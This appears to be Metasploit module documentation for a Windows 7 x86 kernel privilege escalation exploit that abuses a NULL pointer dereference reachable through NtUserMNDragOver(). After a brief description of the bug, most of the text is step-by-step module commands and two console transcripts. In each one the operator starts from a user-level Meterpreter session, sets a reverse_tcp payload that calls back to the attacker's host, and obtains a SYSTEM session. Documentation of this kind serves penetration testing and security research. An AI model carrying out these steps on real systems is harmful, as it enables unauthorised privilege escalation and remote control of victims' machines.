Vulnerable Application
This module exploits a NULL pointer dereference vulnerability in MNGetpItemFromIndex(), which is reachable via the NtUserMNDragOver() system call.
The NULL pointer dereference occurs because the xxxMNFindWindowFromPoint() function does not properly validate the tagPOPUPMENU objects it processes before passing them on to MNGetpItemFromIndex(), which is where the NULL pointer is dereferenced.
This module has been tested against Windows 7 x86 SP0 and SP1. Offsets used by the exploit may need to be adjusted to work with other versions of Windows, such as Windows Server 2008.
Verification Steps
Get a non-SYSTEM meterpreter session on Windows 7 x86
use exploit/windows/local/ntusermndragover
set session <session>
set payload windows/meterpreter/reverse_tcp
set LHOST <LHOST>
set LPORT 5555
exploit
Get a SYSTEM session
Scenarios
Windows 7 SP0 x86
msf5 exploit(multi/handler) > sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.15:49158 (192.168.56.15)
msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[+] Reflectively injecting the exploit DLL and running the exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (176195 bytes) to 192.168.56.15
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.15:49159) at 2020-04-29 17:14:46 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7600).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >
Windows 7 SP1 x86
msf5 exploit(multi/handler) > sessions
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 meterpreter x86/windows User-PC\User @ USER-PC 192.168.56.1:4444 -> 192.168.56.5:49157 (192.168.56.5)
msf5 exploit(multi/handler) > use exploit/windows/local/ntusermndragover
msf5 exploit(windows/local/ntusermndragover) > set session 1
session => 1
msf5 exploit(windows/local/ntusermndragover) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf5 exploit(windows/local/ntusermndragover) > set LHOST 192.168.56.1
LHOST => 192.168.56.1
msf5 exploit(windows/local/ntusermndragover) > set LPORT 5555
LPORT => 5555
msf5 exploit(windows/local/ntusermndragover) > run
[*] Started reverse TCP handler on 192.168.56.1:5555
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Launching notepad.exe to host the exploit...
[+] Process 2696 launched.
[*] Injecting exploit into 2696 ...
[*] Exploit injected. Injecting payload into 2696...
[*] Payload injected. Executing exploit...
[*] Sending stage (176195 bytes) to 192.168.56.5
[*] Meterpreter session 2 opened (192.168.56.1:5555 -> 192.168.56.5:49158) at 2020-04-29 17:18:00 +0800
meterpreter > sysinfo
Computer : USER-PC
OS : Windows 7 (6.1 Build 7601, Service Pack 1).
Architecture : x86
System Language : en_GB
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x86/windows
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >